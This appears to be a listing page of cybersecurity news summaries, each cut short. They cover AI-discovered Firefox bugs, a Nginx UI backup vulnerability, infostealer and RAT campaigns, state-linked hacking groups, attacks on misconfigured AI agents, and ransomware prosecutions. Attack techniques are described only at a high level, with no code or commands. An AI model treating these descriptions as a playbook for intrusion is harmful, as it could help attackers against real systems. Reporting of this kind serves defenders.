ALL POSTS

Key Findings Anthropic's AI model Claude Opus 4.6 discovered 22 security vulnerabilities in the Mozilla Firefox web browser over the course of two weeks. 14 of the 22 vulnerabilities were classified as high-severity, nearly a fifth of all high-severity Firefox issues fixed in 2025. Mozilla addressed the majority of these vulnerabilities in Firefox 148, released in January 2026. This demonstrates AI's growing capability to rapidly detect critical security flaws in complex soft

Background The emldump.py script is a powerful tool used by security analysts and incident responders to extract and analyze data from Microsoft Outlook email archives. This update focuses on enhancing the functionality of the "--yarastrings" option, which allows users to search for specific Yara signatures within the email data. Key Findings The update to emldump.py version 0.0.16 includes fixes and improvements to the "--yarastrings" option. The provided MD5 and SHA256 hash

Key Findings AI-based assistants ("agents") are growing in popularity, with the new OpenClaw AI assistant seeing rapid adoption OpenClaw and other AI assistants can automate virtually any task, accessing the user's computer, files, online services, and integrations Poorly secured AI assistants pose significant risks to organizations, with examples of AI agents accidentally deleting data or being exposed to the internet Attacking misconfigured AI agent web interfaces can allow

Key Findings A critical vulnerability in Nginx UI, tracked as CVE-2026-27944, allows attackers to download and decrypt full server backups without authentication. The vulnerability stems from two major flaws: the /api/backup endpoint lacks authentication, and the server exposes the AES-256 encryption key and IV in an HTTP response header. Exploitation of the vulnerability could have serious consequences as a full Nginx UI backup contains large amounts of sensitive operational

Key Findings BoryptGrab information stealer spreading through over 100 GitHub repositories Malware designed to collect browser data, cryptocurrency wallets, system details, and user files Some variants deploy a PyInstaller backdoor called TunnesshClient for remote command execution Background Trend Micro has uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories. BoryptGrab is capable of collecting sensitive data such as

Key Findings Deceptive mobile campaign discovered targeting people in Israel using a fake version of the popular "Red Alert" life-saving app The app appears to be a modified version of the legitimate "Red Alert" app, which is widely used to provide real-time warnings about incoming rockets The attack starts with a simple text message claiming there is a technical problem with the current alert system and providing a link to download an updated version Background The "Red Aler

Key Findings: Iran-linked hackers targeted IP cameras across Israel and several Gulf countries, including the UAE, Qatar, Bahrain, and Kuwait, as well as Lebanon and Cyprus. The goal appears to be reconnaissance and real-time monitoring to support intelligence gathering and potential military targeting. Threat actors targeted vulnerabilities in Hikvision and Dahua IP cameras, such as improper authentication, command injection, and remote code execution flaws. Scanning and exp

Key Findings The FBI is investigating suspicious cyber activity affecting an internal system that stores sensitive data tied to surveillance operations and investigations. The affected system is unclassified but contains law enforcement-sensitive information, including data from legal tools like pen register and trap-and-trace orders, and personally identifiable information linked to investigations. The FBI has identified and addressed the suspicious activities, using all ava

Key Findings OpenAI has launched Codex Security, an AI-powered security agent designed to find, validate, and propose fixes for software vulnerabilities. Over the last 30 days, Codex Security has scanned more than 1.2 million commits across external repositories, identifying 792 critical and 10,561 high-severity findings. The vulnerabilities found include issues in various open-source projects like OpenSSH, GnuTLS, GOGS, Thorium, libssh, PHP, and Chromium. Codex Security leve

Key Findings North Korean threat groups are using artificial intelligence (AI) tools to accelerate and expand the country's long-running scheme to get remote technical workers hired at global companies. AI services are empowering North Korean operatives across the attack lifecycle, turning AI into a "force multiplier" for their efforts. Threat groups are using AI to shorten the time it takes to create digital personas for specific job markets and roles, leveraging financial o

Key Findings Multi-stage malware campaign codenamed VOID#GEIST delivers various remote access trojan (RAT) payloads, including XWorm, AsyncRAT, and Xeno RAT Malware utilizes obfuscated batch scripts as a pathway to deploy and execute encrypted shellcode payloads Leverages legitimate embedded Python runtime for portability, reliability, and stealth Employs fileless execution mechanisms and memory injection techniques to evade detection Background Cybersecurity researchers have

Key Findings Transparent Tribe, a Pakistan-aligned hacking group, has embraced the use of AI-powered coding tools to mass-produce malware implants. The goal is to flood target environments with a "high-volume, mediocre mass of implants" using lesser-known programming languages like Nim, Zig, and Crystal. These malware samples rely on trusted services like Slack, Discord, Supabase, and Google Sheets to fly under the radar, a technique dubbed "Distributed Denial of Detection (D

Key Findings Google's Threat Intelligence Group (GTIG) identified 90 zero-day vulnerabilities exploited in the wild in 2025, up from 78 in 2024 Nearly half of the flaws (43, or 48%) targeted enterprise technologies, marking a record share and confirming a shift toward enterprise-focused attacks Browser exploitation declined to historic lows, while operating system flaws were increasingly abused Nation-state actors mainly targeted edge devices and security appliances, while co

Key Findings Iran-linked MuddyWater (aka SeedWorm) APT group targeted U.S. organizations, including banks, airports, nonprofits, and a software supplier to the defense and aerospace sectors The group deployed a previously unknown backdoor called Dindoor, which leverages the Deno JavaScript runtime for execution An attempt was made to exfiltrate data from the targeted software company using the Rclone utility to a Wasabi cloud storage bucket A separate Python backdoor called F

Key Findings: Microsoft Defender experts uncovered a widespread ClickFix campaign exploiting Windows Terminal to deliver Lumma Stealer malware. The campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, bypassing Run-dialog detections. Attackers guide users to paste malicious PowerShell commands from fake CAPTCHAs, troubleshooting prompts, or verification-style lures. The malicious payload downloads and executes a multi-st

Key Findings Suspected Iran-nexus threat actor, tracked as "Dust Specter", targeted Iraqi government officials in a campaign observed in January 2026. The threat actor used phishing emails impersonating Iraq's Ministry of Foreign Affairs to deliver previously undocumented malware families, including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The attacks involved two different infection chains, one using a password-protected RAR archive and another consolidating the same fu

Key Findings Tycoon 2FA, a prominent Phishing-as-a-Service (PhaaS) platform, was dismantled by a coalition of law enforcement agencies and security companies led by Europol. The subscription-based phishing kit, which emerged in August 2023, was described as one of the largest phishing operations worldwide. Tycoon 2FA's primary developer is alleged to be Saad Fridi, who is said to be based in Pakistan. The platform enabled thousands of cybercriminals to covertly access email a

Key Findings: A new Russian cyber campaign has targeted Ukrainian entities with two previously undocumented malware families named BadPaw and MeowMeow. The campaign has been attributed with moderate confidence to the Russian state-sponsored threat actor known as APT28. The attack chain initiates with a phishing email containing a link to a ZIP archive, which leads to the deployment of a .NET-based loader called BadPaw and a sophisticated backdoor called MeowMeow. Background T

Key Findings: Evgenii Ptitsyn, a 43-year-old Russian national, pleaded guilty to wire fraud conspiracy for his role in the Phobos ransomware operation. Ptitsyn was a high-level administrator of the Phobos ransomware-as-a-service (RaaS) operation. The Phobos ransomware operation targeted over 1,000 public and private entities worldwide, extorting more than $16 million in ransom payments. Ptitsyn and his co-conspirators used a RaaS model to distribute Phobos ransomware to a net

Key Findings Researchers uncovered a Russian campaign targeting Ukrainian entities with new malware families BadPaw and MeowMeow delivered through phishing emails. The attack chain begins with a phishing email carrying a link to a ZIP archive. When opened, an HTA file displays a Ukrainian-language lure about border crossing appeals while secretly launching the infection chain. The malware uses the .NET Reactor packer to make analysis and reverse engineering harder, showing th